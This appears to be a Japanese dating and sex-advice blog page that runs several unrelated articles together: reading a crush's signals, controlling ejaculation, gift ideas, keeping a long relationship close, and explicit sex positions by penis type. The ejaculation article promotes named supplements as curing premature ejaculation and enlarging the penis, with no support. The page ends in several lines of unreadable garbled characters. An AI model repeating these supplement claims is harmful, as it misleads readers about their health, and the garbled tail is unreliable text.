未分類

好きな人の気持ちがわかってしまう9つの方法

あなたは現在、片思い中ですか?

好きな人ができると、気になるのは相手の気持ちですよね。

直接聞くのが手っ取り早い方法ですが、それはなかなか勇気がいるもの。

ですが直接聞かなくても、態度や仕草に、あなたへの気持ちがあらわれていることがあるのです。

そこで今回は、好きな人の気持ちがわかる方法をご紹介したいと思います。

よく目があう



好きな人が自分の視界に入ると、その人をついつい目で追ってしまうものです。

つまり、相手の人とよく目があうということは、相手の人もあなたを目で追っているから。

1度や2度なら、偶然かもしれません。

そうではなく、何度も目があうのであれば、あなたを目で追っている可能性が高いです。

また、目があったときの視線のそらしかたを観察してみてください。

目線を斜め下にそらすのは、恥ずかしさのあらわれです。

つまり好きとまでいかなくても、あなたに好意を持っている、もしくは気になる存在であるのは間違いないでしょう。

用事がなくても連絡がくる



何とも思っていない相手には、用事がなければ連絡しませんよね?

何も用事がなくても、電話やメール、LINEなどでメッセージがくる場合、あなたに好意を持っているかもしれません。

あなたと親しくなりたい、あなたのことをもっとよく知りたい、あなたとの繋がりを途切れさせたくないという気持ちのあらわれの可能性があります。

「用事はないんだけど、連絡しちゃった。」「ヒマだからつい連絡しちゃった。今なにしてる?」などのメッセージがきたら、あなたに好きという感情を抱いているのではないでしょうか。

逆に、あえて用事がないときに、あなたからも連絡してみてください。

返信が早かったり、次から次に話題をふってきてくれるのであれば、好意を持っているはずです。

相手からの返信が遅れても、その後、話題が途切れることなく連絡が続くようなら、相手にとってあなたは気になる存在である可能性があります。

パーソナルスペースが狭い

パーソナルスペースとは、対人距離のことをいい、他人が近付いたときに不快に感じる空間のことをさします。

例えば、満員電車などの人混みで、他人と至近距離になったときに不快に感じたことありませんか?

それがパーソナルスペースです。

特に女性は、男性よりもパーソナルスペースが狭く、他人が至近距離にくると、不快に感じやすい傾向にあります。

あなたと歩いていたり、会話をしたりしているときの2人の距離はどうですか?

歩いているとき、手が触れそうな距離感だったり、会話をしているときに、相手が前のめりになっていたりと近くありませんか?

このように、自然とパーソナルスペースを相手から狭めてくるようであれば、あなたに好意を抱いていると思って良いでしょう。

好意を持っている相手だからこそ、近い距離にいても、不快に感じることがないのです。

身体をこちらに向けている

隣に座っているときや、話をしているとき、相手の身体はどちらを向いていますか?

話を聞くときなどの姿勢は、無意識におこなわれる気持ちのあらわれです。

好きな人の話は、どんな話でもしっかり聞こうとします。

そのため、自然と身体が相手の方に向くのです。

ですから、あなたのほうに身体を向けて話をしたり、聞いていたら、好意を持っている可能性があります。

さらに前のめりになって、話を聞いたりしているのも、あなたに好意を持っているあらわれと考えられます。

あなたのことをいろいろ聞いてくる

好きな人や、気になる相手のことはどんなことでも知りたくなるものです。

好きな食べ物や休日の過ごし方など、いろいろ聞いてくるのは、あなたのことを知りたいというサインです。

なかでも「好きな女性のタイプ」「恋人の有無」を聞かれたら、好意を持っている可能性は高いと思います。

楽しそうにしている



好きな人と一緒に過ごしていると、テンションが高くなったり、自然と笑顔がこぼれるものです。

気持ちが浮かれて、ニヤついてしまっていたという経験がある人も多いのではないでしょうか?

あなたと過ごしているとき、相手の人はどのような表情を浮かべていますか?

いつもニコニコ楽しそうにしているのなら、あなたに好意を持っている可能性大です。

思わせぶりな態度をしてくる

相手の態度に注目してみてください。

冗談っぽく「あなたのそういうところが好き」など、まるで告白かと思ってしまうような思わせぶりな態度や素振りをされていませんか?

思わせぶりな態度は、あなたの気を引こうという気持ちのあらわれです。

あなたのことを好きな可能性がありますよ。

また、逆に思わせぶりな態度を相手にしてみて、そのときの反応を見てみるのも良いでしょう。

思わせぶりな態度や素振りに対して、照れたり、それに乗ってくるようであれば、脈ありです。

デートに誘ってみる



相手の気持ちを確認する方法の定番ですが、デートに誘ってみましょう。

誘いに対して、快く応じてくれたのなら、あなたに好意を寄せていると考えられます。

もし断れてしまっても、「◯日なら大丈夫なんだけど、どう?」などと提案してくれるようなら、落ち込む必要ありませんよ。

もうすぐクリスマスですから、少し勇気がいるかもしれませんが、クリスマスデートに誘ってみてはどうでしょうか?

OKだったら、かなりの高確率であなたに好意を寄せている証拠です。

心理テストで相手の気持ちを探る

ここで紹介するのは、相手に自分の手を差し出して、指を1つ選んでもらうという簡単なものです。

選んだ指によって、あなたをどう思っているのかがわかる心理テストになります。

親指は良き相談相手、人差し指は仕事や学校での良きパートナー、中指は友達、薬指は結婚を考えられる相手、小指は理想的な恋人というのが診断結果です。

必ずしもそうとは限りませんが、参考までにやってみても良いのではないでしょうか。

まとめ

自分のことをどう思っているのか、直接聞かなくても、相手の態度や仕草で気持ちを読み取ることができます。

相手の気持ちが気になる場合、相手のことを観察してみてください。

もうすぐクリスマスですから、クリスマス前にカップルになれるといいですね。

【ふにゃちんさよなら!】勃起したまま射精をコントロールする10個の方法

セックス中にどうしても射精を我慢することが出来ず、自分だけ先にイってしまい、その度に彼女や妻から不満な顔をされて、自分が情けなくなってしまい自信がなくなってしまうことが、1度は経験があるかと思います。

そこで、どのようにすれば射精をコントロールすることが出来るのか、10個の方法を紹介したいと思います。

射精コントロールを学ぶ



程度に差はありますが、早くイクのも遅くイクのも女性から嫌われてしまいます。

射精の癖を改善するのは難しいですが、「個人差があるんだから仕方ない」と開き直り、一人よがりなセックスを続けてしまうと、彼女や妻から本当に嫌われてしまうかもしれません。

セックスは、男女間のとても重要なコミュニケーションですので、射精コントロールの方法を学んで実践すれば、彼女や妻と一緒にオーガズムを迎えることが出来たり、関係をもっと良くすることが出来たりするかもしれません。

セックスに集中しすぎないようにする



例えば女性の気持ち良さそうな表情や感じているときの息遣い、喘ぎ声は全て日常生活では見ることが出来ない姿なので、それだけで男性は興奮します。

そうでなくても膣にぺニスを挿入して気持ちよく刺激されているのに女性のエロイ姿を見てしまうと、脳がどんどん興奮して射精を我慢できなくなりますので、あえてセックスに集中しないで、セックスの最中に彼女の方を見ていても、頭の中では別のことを考えるようにしてください。

例えばですが、明日の仕事のことやテレビ番組の内容を思い出してみたり、帰宅途中で見たおじさんのことを思い浮かべたりして、ぺニスが萎えない程度に興奮を抑えてください。

ですが、射精は精子を出してしまう10秒前から始まっていると言われていますので、自分が「イキそう」と思った時には遅すぎますから、ぺニスを挿入したらすぐに気を散らしながら腰を動かすようにしてください。

膣に挿入したら動かないようにする

早くイってしまうことで悩んでいる男性は、女性を愛撫する時間が極端に短すぎて、女性のイク準備がととのっていない等があります。

愛撫は運動でいう準備体操と一緒で、体をほぐして怪我を防ぐのと同じで、イキやすくなるように体をほぐし脳を興奮させてあげないと、女性はなかなかイケません。

女性が先にイケば射精をコントロールする必要はなくなりますので、愛撫をいつもより長めにしてください。

膣にぺニスを挿入したらとにかく、激しく腰を動かすのは間違いで激しく腰を動かすのは、女性がイキそうになってからです。

それまではスローテンポでぺニスを膣に挿入したら、10分くらい動かないでキスや愛撫をすると、女性は焦らされて感度が高まることによって、あなたが少し動いただけで女性はイってしまうかもしれません。

腰を動かすときもゆっくりし、女性の膣壁を擦って快感を与え、自分がイキそうになる前に動きを止めて気持ちを落ち着かせることによって、いつもよりも長く射精を我慢することが出来ます。

ぺニスを刺激に慣れさせること



オナホールを使って、ぺニスを刺激に慣れさせ射精しづらい体にすることが出来ます。

オナホールは、女性の膣以上の快感を与えてくれる男性用のオナニーグッズで、締め付けが強すぎるオナホールだと挿入した瞬間にイってしまいますので、まずは緩いものから始めてください。

オナホールを使うときは、ゴムがぺニスの皮や亀頭を擦って痛くなりますので、ローションをつけて本番と同じようにコンドームをつけてしてください。

オナニーをしていると、そのうちにイキそうになってきますので、そのタイミングを覚えてイキそうになる前に手を止めて、射精を我慢するトレーニングをすることによって、イキづらくすることが出来ます。

ただし、このトレーニングはやり過ぎると、遅くイってしまう可能性がありますので、くれぐれもやり過ぎには注意してください。

骨盤底筋群を鍛えること

射精をするときに使われる骨盤底筋群を鍛えることによって、射精を我慢することが出来ますが、例えば男性ならおしっこを我慢しているときのことを思い出すと、肛門近くの筋肉をきゅっと締めますがその部分が、骨盤底筋群です。

おしっこの時と同様に、射精の時も骨盤底筋群を締めることで僅かな時間ですが、射精を我慢することが出来ますし、勃起力も向上します。

骨盤底筋群を鍛えるのは座りながらでも出来、まずは肛門をきゅっと締めてその状態を5秒間維持し、次に力を抜いて5秒間維持するのを繰り返すだけで、仕事の合間や就寝前に行うと一番効果的です。

射精しにくい体位に切り替えること



実は射精しづらい、深い挿入や激しいピストンが出来ない体位がいくつかあり、もう少し続けたいけどイってしまいそうというときは、射精しにくい体位に切り替えてください。

射精を我慢しやすい体位として代表的なのは側位で、深い挿入や激しいピストンが出来ないことから、射精がしにくい体位と言われています。

男性が動きにくい体位なので、女性に物足りないと思われてしまうかもしれないので、必ずキスを入念にして物足りなさを補ってください。

また対面座位も射精しにくい体位で、椅子などに座ると射精時に必要な筋肉の緊張がなく、射精しにくいので小休憩するための体位として有効です。

呼吸法を試してみる

実は勃起して射精するときには、興奮を促す交感神経が活発になっていますので、呼気を長くするだけで、体をリラックスさせるための副交感神経が活発になり、抑制することが出来ます。

鼻から吸って口からゆっくり吐くのを、1分ほど繰り返し特にピストン運動を緩めなくても、イキそうな感覚が収まってくるはずです。

おでこを手のひらで押さえること



これも非常にシンプルなのですが、副交感神経がおでこを手のひらで押さえることによって、活性化するために射精のコントロールにつながりますが、セックス中にいきなりおでこを押さえると、女性から「どうしたの?」と疑問が生まれますので、バックなど女性からは見えない体位の時にするようにしてください。

先程の長く息を吐くのと一緒に行うのが効果的です。

連続ですること

我慢できなければ射精して、すぐにするというのもいいかもしれません。

一回出したら終わりの風俗では出来ませんが、愛するパートナーとのセックスなら、「2回もしてくれた」と彼女は喜んでくれます。

初めての相手なら早いとビックリしてしまうかもしれませんが、「膣の中があまりにも気持ちよくて我慢できなかったから、もう一回しよう?」と誘ってあげれば一番の誉め言葉になります。

一回だしてしまうと眠くなってしまう人は、セックスをする少し前に自分でオナニーをしておくことによって、感覚が鈍くなるので射精コントロールをしやすくなります。

サプリメントや勃起薬を活用してみること



セックス中の工夫や普段の生活改善からも射精をコントロールすることは可能ですが、サプリメントのほうが高い効果が期待できます。

少々値段はしますがライゼックスというものや、テンザーゴールドなどのサプリメントが、早く射精してしまうことや勃起力を改善することが出来ます。

どちらも数ヶ月飲むことでぺニスのサイズ自体の巨大化も出来るそうです。

病院で包茎の治療をすること

早くイってしまう、遅くイってしまうことで悩んでいる人の中には、包茎であることが原因かもしれません。

例えば包茎性早漏は包茎であることにより、常に亀頭が皮をかぶった状態なので、セックスするとなると亀頭への刺激が強すぎてすぐにイってしまいます。

また常に包皮で包まれている亀頭が敏感になりすぎて、挿入では痛みを感じてしまい遅くイってしまいますが、亀頭への刺激に慣れることが出来れば改善する可能性が高いです。

亀頭を露出させてオナニーを繰り返すことによって、徐々にですが亀頭への刺激に慣れて、射精までの時間を伸ばすことが出来ますが、勃起しても皮が剥けない真性包茎、カントン包茎の場合はセックスでも亀頭が露出しないので、刺激が弱くなり遅くイってしまいます。

こうした状態で悩んでいるなら、包茎治療の専門家の所に行き、手術するしないは別にして正しい射精の方法について助言をもらえるはずですが、今後楽しいセックスをするためにも包茎はしっかりと治しておくことをおすすめします。

まとめ

勃起したまま射精をコントロールする方法を10個紹介してきましたが、ぜひセックスの時には自分も彼女や妻も楽しめるように試してみてください。

他にも亀頭を麻痺させるスプレーなんかもありますので、どうしても早くイってしまうのが改善出来ないようであれば、使用してみてください。

【彼女の誕生日プレゼントはこれで決まり!】オススメプレゼント厳選4選!

カレンダーをふと見ると…もうすぐで彼女の誕生日。

「誕生日プレゼント送りたいけど、何が良いんだろう?」となりがちですよね。

そんな迷える貴方にオススメするプレゼントを紹介したいと思います。

お花



お花を渡すと言うと、真っ先に浮かぶのが花束ですが、花束を彼女に誕生日に渡すとなると、キザ過ぎたり90年代のトレンディドラマを彷彿としたり、何となくバブル時代臭がして、『いつの時代の話よ!?』と彼女は引くかもしれません。。。

とは言うものの、女性はお花が本当に大好きな方が多いのです。

そんなお花ですが、渡し方次第では、貰うと確実に喜んでくれるのは間違いありません。

フラワーボックスの活用

そこで、キザっぽくなく、トレンディドラマにもならず、バブル時代(?)っぽくないお花の渡し方が、『フラワーボックス』の活用です。

ボックスの中にいっぱいになった色鮮やかなお花。

彼女をロマンチックな心でお花の匂いと共に包み込むこと間違いありません!

しかし、ゴチャゴチャ多種多様のお花をただ、フラワーボックスにしても、自己満足にしかなりません。

大事なのが事前に彼女が好きなお花をリサーチすることです。

しかし、彼女が特に好きな花が無い場合は、花言葉から自身で花を選ぶ。

貴方にとって、彼女とは?彼女と今後、どのように過ごしたいのか?花言葉にはいろいろな意味があるものです。

一年に一度の誕生日が一生記憶に残る素敵なお花をプレゼントしてみてはいかがでしょうか。

アクセサリー



アクセサリーも女性は送ってもらうと喜んで貰えるものですね。

女性自身も『自分の為に選んでくれた』ととても嬉しくなるものです。

貴方の大好きな彼女がアクセサリー1つで、更に美しくなったり、可愛くなったりする魔法のアイテムですよね。

だけど、アクセサリーって言っても多種多様だし、値段もピンからキリ…それこそ、フラワーボックス同様、選び方を間違えるとただの自己満足になりかねません。

そんなことばかり考えていると正直、何をどう選べば良いのか分からなくなりますよね。

そこで、以下の点がとっても大事になります。

高過ぎるものや、指輪はNG

まだ、お付き合い段階である『彼女』の場合、キラキラし過ぎて値段の張るものや、まだプロポーズ段階ではなく、お付き合いしてまだ間もない時は、ストレートに『結婚』を意識させる指輪なんかは彼女にとって重くなってしまうこともしばしば…。

そこで、オススメするのが、ネックレス!

比較的、安価な物が多くデザインも豊富で彼女の喜ぶ顔を浮かべながら選び甲斐があるアクセサリーなのです。

上手なネックレスの選び方とは?

ズバリ、普段のデートで良く彼女が着てる服装に合いそうな物を選ぶことです。

せっかくだから、デートだけでなく、普段使いもして貰えそうな物を選んで上げたりすると良いかもしれません。

普段使いが出来るものならば、着ける度に貴方のことを思い出して貰ったり、それこそ恋しさが増し、デートの回数が増えたりするかもしれません。

遊園地のチケット



遊園地のチケットなんて。。。ちょっと子供っぽいんじゃない?と思った貴方!それは大きな間違いですよ。

誕生日に二人で逢い、食事をしたり、ショッピングをしたり、1日一緒に居れて満足してるところに、そっと、「誕生日おめでとう!」と渡してあげて下さい。

再び1日一緒に居る時間が『確実に』出来るという安心感が、彼女に生まれるのです。

女性にとって、次のデートが確実に出来ると言うのは、とても安心感が生まれ、気持ちもとても高ぶるのです。

そして、貴方自身も大好きな彼女の誕生日をお祝い出来、次のデートが確実に出来る。

一石二鳥と、言葉はちょっと悪いですが、お互いに得をしたり、安心感も生まれる誕生日プレゼントでもあるのです。

注意点

『でも、オレの彼女。。。アトラクション苦手だし、遊園地余り得意じゃないんだよなあ。。。』

と遊園地のチケットをプレゼントをするに辺り、彼女が遊園地が苦手という問題点がある場合。

この項目はスルーだな…と思った貴方にも、このような考え方も出来ます!

比較的、乗り物酔いが激しく、遊園地が苦手である彼女でも、遊園地って1日歩くだけでも楽しめたりするし、日頃の煩わしさやストレスからも解放してくれるのが、テーマパークの魅力的なところ。

遊園地って一口に言っても、乗り物メインではない公園のような場所など多種多様ですから、彼女の普段の好みに合わせてチョイスをしてあげて下さいね!

喜んでくれる確率は大いに期待出来るのではないでしょうか?

腕時計



アクセサリーもそうかもしれませんが、時計と言うのは、人とは切ってもそれこそ切れないもの。

ベストオブ誕生日プレゼントと言っても過言では無いかもしれません。

『今、何時かな?』

と時計を見る度に貴方のことを思い出してくれること間違い無し。何年も付き合っていて、一通りプレゼントしちゃって、上げるもの無いなあと思ったら、もう迷うことなく腕時計をプレゼントしてあげてみてはいかがでしょうか?

腕時計は何個持っていても嬉しいものです。

選び方の難易度の高さ

しかし、腕時計と言うのは、アクセサリーと違い、普段使いをして貰うのが、大前提なだけに、時計のプレゼント選びは非常に難易度が高く、貴方自身のセンスも左右されます。

キラキラし過ぎて、アクセサリーがちりばめられたようないかにも高級品な物だと引かれるかもしれませんし、シンプル過ぎると安っぽく見えてしまうかもしれません。

それこそ、貴方が普段、彼女の好みや性格、全てにおいて彼女をどれだけ理解してあげられてるか、試される機会かもしれません。

ペアウォッチのすすめ

そんな難しいなら、腕時計は控えようかな。。。と弱気になりかけた貴方にオススメしたいのが、ペアウォッチです。

彼女のことは理解してるけど、結局、どれを選べば良いのか分からなくなった場合、また、付き合って日が浅くて、まだ彼女の好みや性格を理解しきれないけど、腕時計をプレゼントしたい!と言う貴方には、ペアウォッチと言う選択肢も存在します。

女性は、お揃いの物を身につけることにとても喜びを感じますが、ペアウォッチには、お互いの時間をお互いに共有出来ると言う意味合いもあります。

普段、一緒に居る時間がなかなか取れなくても、また付き合って日が浅くても、時計を見る度にお互いがお互いのことを思い出すことが出来、より一層、愛を深めることが出来ることと思われます。

まとめ

厳選に厳選を重ね、4点に絞った誕生日プレゼントですが、どれにも共通しているのが、誕生日だからと言って、義務的に何かを機械的に選ぶのではなく、自己満足にならず、彼女である相手のことを本気で選ぶことで、今後を左右するものです。

相手の喜ぶ顔を第一に考えて、思いやりを持って、プレゼント選びをしてあげて下さいね!

付き合って3年のカップルでもラブラブでいるためにすべき9つのコト

どんなカップルでも、付き合った当初はラブラブなはず。

ですが悲しいことに、恋の賞味期限は3年と言われています。

実際、3年以上付き合っているカップルで、ラブラブな関係を保っているカップルは少ないのが現状です。

ですが、ラブラブを維持することを諦めるのはまだ早いですよ。

少しのコツでラブラブな関係を維持できる可能性があります。

そこで今回は、ラブラブな関係を保つコツをご紹介したいと思います。

ケンカはその日のうちに解決する


長年付き合っていれば、多少の衝突はつきものです。

もういい。」などとカッとして、その場を立ち去ってしまう人もいるかと思います。

気持ちを落ち着かせるために、一旦その場を離れるのは良いです。

ですが、そのままケンカを翌日に持ち越すのはやめましょう。

お互いわだかまりができてしまったり、時間をあけたことで、ケンカの内容をしっかり解決しないまま、なんとなく仲直りしてしまうことがあります。

その日にしたケンカは、必ずその日に解決してください。

お互い冷静に納得するまで、話しあいましょう。

1つ1つのケンカをしっかり解決することで、お互いの絆は一段と深まるはずです。

実際、3年以上付き合っていてもラブラブなカップルは、ケンカはその日のうちに仲直りするというルールを設けているカップルが多い傾向にあります。

ウソや隠し事はしない

そもそもやましいことがなければ、相手にウソをついたり隠し事をすることはないはずです。

何でも話せる関係は、信頼がなければ築けないですよね。

このようなカップルは、長年付き合ってもラブラブでいられるのではないでしょうか。

名前で呼び合う


お前」「ねえ」「おい」など、相手を見下すような呼び方は絶対ダメです。

どんな時でも、お互いに名前で呼びあいましょう。

きちんと名前で呼び合うというのは、相手に対しての思いやりの気持ちを忘れないことにも繋がります。

いつまでも思いやりの気持ちを持てるカップルは、長年付き合ってもラブラブでいられるはずです。

スキンシップをとる

付き合う期間が長くなるほど、スキンシップは減ってしまうものです。

3年経ってもラブラブでいるためには、スキンシップはとても大切なんです。

キスをする、ハグをする、手を繋いだり腕を組むなどのスキンシップは、脳内にある「オキシトシン」と呼ばれるホルモンが大量に分泌されます。

このホルモンは別名「恋愛ホルモン」と呼ばれ、私たちに幸福感をあたえる働きがあります。

つまりこのホルモンが分泌されるほど、お互いに幸福感を感じることができるのです。

ですから、いってらっしゃいのキスをする、出先では手を繋ぐか腕を組むなど、スキンシップを2人のルールにしてしまうのもオススメです。

ドキドキ感だけでなく安心感を求める


ドキドキ感は、残念ながら持続させるのは難しいです。

そのため、相手に対してドキドキ感のみを求めてしまっては、物足りなさを感じてしまう原因になります。

いつまでもラブラブでいるためには、ドキドキ感だけでなく、安心感を求めましょう。

一緒にいると安心する。」と感じられた時、安心感が得られただけでなく、2人の愛情が深まった証拠でもあります。

安心感で満たされていれば、ドキドキ感が減ってしまったことに対する物足りなさも感じにくいのではないでしょうか。

サプライズをする

私たちの脳内には「ドーパミン」と呼ばれる物質があります。

このドーパミンは、人を好きになった時に大量に分泌され、その分泌効果は18ヶ月〜3年間と言われています。

つまり3年目以降は、ドーパミンは分泌されなくなるのです。

ですが、サプライズなど2人でワクワクできることを共有すると、お互いのドーパミンが分泌できます。

その結果、3年間付き合っていてもラブラブでいられるのです。

ですから記念日や誕生日など、特別な日にはサプライズをしましょう。

ドーパミンが分泌されるだけでなく、記念日などを大切にすることで、お互いに想い合う気持ちも強くなると思います。

プラスな言葉はどんどん伝える


長年付き合っていると「言わなくてもわかってくれている。」と思いがちです。

それでは、いつまでもラブラブではいられません。

言わなくてもわかっていることであっても、きちんと言葉で伝えましょう。

いつもありがとう。」「好きだよ。」「楽しいね。」などプラスな言葉は、思ったときにその都度相手に伝えてください。

言葉に出すと、自分の気持ちを再確認でき、相手に対する気持ちが強くなると思います。

さらに自分から積極的に言葉に出していると、自然と相手も言葉にしてくれるようになります。

お互いにプラスの言葉を言い合えるようになると、ラブラブ度も高まるのではないでしょうか。

束縛しすぎない

全く束縛しないのも「私が何をしようと関心がないのかな。」などと思わせてしまう可能性があるので、多少の束縛やヤキモチは、相手に伝えても良いと思います。

ですが少し連絡が取れないだけで、しつこく電話やメールをしたり、自分以外の人と過ごす時間を優先されることに不満をぶつけたりと、極端な束縛は絶対にNGです。

相手は息苦しさを感じてしまい、ラブラブでいられるどころか破局の原因になってしまいます。

まずは、疑う前にお互いを信用しましょう。

信頼関係がしっかりしていれば、少し連絡が取れなくても、不安になんかなりません。

さらに、相手が友達や家族と過ごす時間に関しても、理解できるのではないでしょうか。

その間に、あなたも友達や家族と過ごすのも良いですし、自分磨きや趣味に時間をさくのも良いと思います。

このように2人でいる時以外の時間も尊重し合えることも、ラブラブでいるためのコツです。

会わない時は必ず毎日連絡を取り合う


会わない日があるときは、最低でも1日に1回は電話やメールで連絡を取り合いましょう。

会っていないときでも、コミュニケーションをかかさずおこなうことも、ラブラブを保つための秘訣です。

まとめ

付き合って3年経ってもラブラブでいられるためには、上のようなコツがあったのです。

今、倦怠期で抜け出したいと考えている人、これからもずっとラブラブでいたいと考えている人は、是非参考にしてみてください。

ぺニスの形と大きさごとに9つのおすすめ体位

ぺニスの形や大きさは、人それぞれ違っていて、感じる部分も違っていますよね。

「気持ちイイ!」と感じるポジション、女性とのセックスでより快感を求めている貴方、最適な体位知りたいですよね。

貴方のぺニスの特徴を活かして、セックスでパートナーと楽しむための体位をいくつかご紹介して行きます。

短めタイプ



このタイプのぺニスは、普通の正常位では相手女性のお尻のお肉と男性の太ももがぶつかり深く結合出来ないのです。

正常位でセックスするポイントとしては、相手女性の足を肩にかけるようにして、挿入してみて下さい。

すると、深く結合されて短さもカバーされ満足度がアップするでしょう。

オススメはやはり後背位です。

普通に四つん這いの状態から腕を折り曲げ、お尻を突きだしてもらう様な姿勢になってもらいセックスしてみて下さい。

女性の膣圧が上がり、深く結合出来る体位なので、ロストぺニスする事なくパートナーとのセックスを楽しめるでしょう。

カリ高タイプ

カリの段差が大きい程、ピストンした時に気持ちいいと感じる方が多いのではないでしょうか。

カリ高タイプは、ピストン運動が出来る体位であれば、全て気持ちいいと感じる事が出来るでしょう。

女性が安定して力を入れられる正常位は一番カリが擦れ快感度が上がるので外せない体位です。

また後背位も女性の膣圧が上がるため、より気持ちよくなります。

騎乗位では、パートナーにリードしてもらったり、時には下から突き上げて気持ちいいポイントを探してみるのも良いでしょう。

長めタイプ



長めだと、セックスする女性によって変わってきますが、奥まで届き過ぎて突き上げられる時に快感より痛みを感じてしまうようです。

ぺニスが、ガツンっと奥まで届き過ぎない、側位や寝バックなど足を閉じた体位をオススメします。

あまり、気持ちよくなさそう、とイメージされる方がいらっしゃると思いますが、女性のお尻のお肉がクッションになり、深い結合が出来るのです。

また、膣圧が上がるため、肉を掻き分けて入って行く感覚もバッチリあって気持ちイイポイントになるでしょう。

パートナーが足ピンしやすいため、足ピンしないとイケない女性とのセックスでは、相性抜群の体位です。

短くて細い短小タイプ

このタイプのぺニスは、側位や寝バックではなかなか気持ちよくなれません。

ぺニスの特徴を活かしたセックスは、奥の奥までグイグイ挿入することがポイントになります。

例えば正常位の状態で、パートナーの伸ばした両足を持ち上げるようにして、体を二つ折りにするように押えてみましょう。

女性の膣圧もぐっと上がり、お肉にジャマされずに挿入出来ます。

挿入しやすくするポイントは、パートナーの腰の下に厚めのバスタオルか薄手のクッションを差しこむことです。

そうすると膣口が上がり、より挿入しやすくなるのです。

一度挿入したら、抜き差しするより、奥の奥をグイグイと攻める腰使いをオススメします。

細めぺニス

短くはないけれど、細めのぺニスはセックス中に良く抜けてしまうことがあるのではないでしょうか。

このタイプのぺニスは、女性が足を閉じた状態の体位がオススメです。

側位や寝バックなどが気持ちよくセックス出来る体位なので、試してみて下さい!

正常位で行うならば、ぺニスが抜けないようにパートナーに足で蟹挟みにしてもらうと良いでしょう。

ピストンするより、小刻みに膣内で動く
事でより快感度が上がるので気持ちよくなれます。

先細スレンダーなぺニス



カリ高タイプのぺニスと正反対なのが、このタイプのぺニスでピストンがあまり向いていないのです。

先細スレンダーはGスポットやポルチオを刺激する事に特化しています

例えば、騎乗位で女性が背中を反らしている状態で、パートナーの腰をぐっと押え前後に動かし、お腹側にあるGスポットをグリグリする感じがポイントです。

ポルチオを刺激したい場合は、正常位で肩に女性の足をかけた状態や両足を胸に抱えるようにしてもらい挿入し、グリグリと押し付ける感じで動くとイイでしょう。

持っているぺニスを最大限に活かしたバックから奥の方をじわじわと圧迫する体位がオススメです。

竿の真ん中が太いタイプ

このタイプのぺニスは、深く結合しようとすれば根元が細くなっているため行為中に抜けやすくなりますよね。

ぺニスが抜けないように注意して太い部分を上手に使う事がポイントです

騎乗位や座位がおすすめですが、正常位でも楽しめます。

例えば、マッサージ師になった気分で、膣の浅い場所から少しずつピストンし始め、膣の中心辺りを丁寧に揉みほぐすようにピストンしてみましょう。

女性は浅い部分から解されて、徐々に広げられて来るため、ぺニスを受入れやすくなります。

竿の太い部分でのピストン運動でお互い絶頂を迎える事ができ、心地よいセックスを楽しめるでしょう。

巨根タイプ



このタイプのぺニスは、すごく激しいピストンやめちゃくちゃに奥まで突く事が難しいのです。

女性によると思いますが、膣内が傷ついたり痛みを伴いながらのセックスになるため、男性がしっかりコツを知っておく必要があるのではないでしょうか。

体位選びのポイントは、お互いの上半身を離さない事が一番です。

上半身をくっつけている事で、男性の腰が動く範囲が小さくなって、激しい摩擦を和らげる事が出来るのです

例えば、後背位でセックスする時に女性を四つん這いにさせるだけではなく、出来るだけ上半身を起こしてもらい、立ちバックに近い体位にしてみましょう。

数ある体位の中でオススメは、ずばり!寝バックです。

お尻がクッションの役割をしてくれて、深すぎる挿入を避けて浅い侵入角度からのゆっくりしたピストンが出来ます

また、騎乗位の時にはパートナーに太ももの上に足の甲を乗せてもらい、女性の体を押えながらピストンしてみて下さい。

脚がバネの役割をしてくれて、突き上げの衝撃を吸収するので、女性に痛みより快感を与えるセックスが出来ます。

ひねくれタイプ

ぺニスが曲がっているタイプの事を良い、右曲がりや左曲がり、あるいはぺニスの先っぽが下を向いているという方がいらっしゃるのではないでしょうか。

体位選びの時は、曲がり具合と女性の気持ちイイ部分が合う様に微調整できるようにする事がポイントです。

例えば、正常位の場合は片方の膝を曲げパートナーに抱き抱えるようにしてもらうと、挿入後擦れる部分がお互いに気持ちいいトコロに当たるのです。

そして曲がり気味の竿タイプが気持ちいいと感じるオススメ体位が松葉崩しです。

お互いに足を交差した状態でのセックスで、曲がり具合でパートナーに左右に体を倒してもらいながら、じっくり気持ちいいトコロを探ってみて下さい

まとめ

いかがでしたか?

ぺニスの形や大きさで、フィットする体位が違っていたりするものです。

貴方の持つぺニスを最高に活かして、体位選びをしながらセックスを楽しむ参考にしてみて下さい!

ai?????i??a??a??a?i???i???a?i??a??a??i??ai??i????i??a??a??a?i??a?i??ai??i??a??a??a?i??????i???ci???

AVai??i??ei??i??a?i??a?i??ai??i??a??a?i??a?i??a??ai???a?i??a??ai??i??ai???a??ai???a?i??ai??i??a????i??a?i??a???i??i??a?za??a?i??ai???a??a?i??ai???a??a?i??ai?????i??ai??i??a??a??ai??i??a??a??i??

a?i??a?i??ai??i??a??a??a?i???i??i??ai???ai??i?????a?i??ci??i???i??i??a??a?i??a?i??a???i??i??a?i???i???a??ai??sa?i??a?i??a?i??a??a??a?i??a?i??a?i??ai??i??a?i??a?i??i?Y

a??ai???a?i??ai??i??ai??i??a?i??a?i??a?i???i??i?????a??ei???a?i??a??a?i??a??a?i??a??ai???a?i??a?i??a??a?i??ai??i??ai??i??a?i??i??

ai??Ya???i??i??a?za??a??a??a?i??ai??i??a???i??i??a???Si??e?i??a??a?i??ai??i??ai??i??a?i??a?i??ai???ai??i??a??ai???ai???a?i??a?Sa?i??a?i??ai??i??a??a?i??ai??i??ei???ei???a??a??ai???ai??i??a?i??a?i??a?i??a??a?i??ai??i??

?i??i??a?za??ai??i??a?i??a?i??ai??i??ai??i??a?i??a??ai??i??a??ai???ai???ai??i??a?i??a?i??ai??i??a??a?i??a??a?i??ai??i??e?Ze?i??a?i??a??a?i??ai??Sa??a?i??ai??i??i??

ai??Sai??za??a??ai??i??a???i??i??ai???a?i??ai??i??a??a??a??c??ai??Ya?i??ai???c??a?i??a??ai??i??a?i??ai???a?i??a??ai???ai??i??a?S?i??i??a??a?i??a?Ya?i??a???i???a?i??a??a?i??ai??i??

a??ai??i??a??ai??i????i??a??a??a??a??i?Y



a???i??i??a?i??ai??i??c??a??ai??i??ai???a?i??ai???ai??i????i??a??a??ai??i??

e??a?i????i??a??a??a?i???i???a?i??a??a?i??a?i??ai??i??a?i??a??a?i??ai??i??a??a?i??a?i??ai??i??a??a?i??a?i??a?i??ai??i??

ei???a?i??a?i??a??a??ai??i??a??a??a??a??a?i??ai??i??e??a?i??a?i??a??a?i??ai???a?i??i??

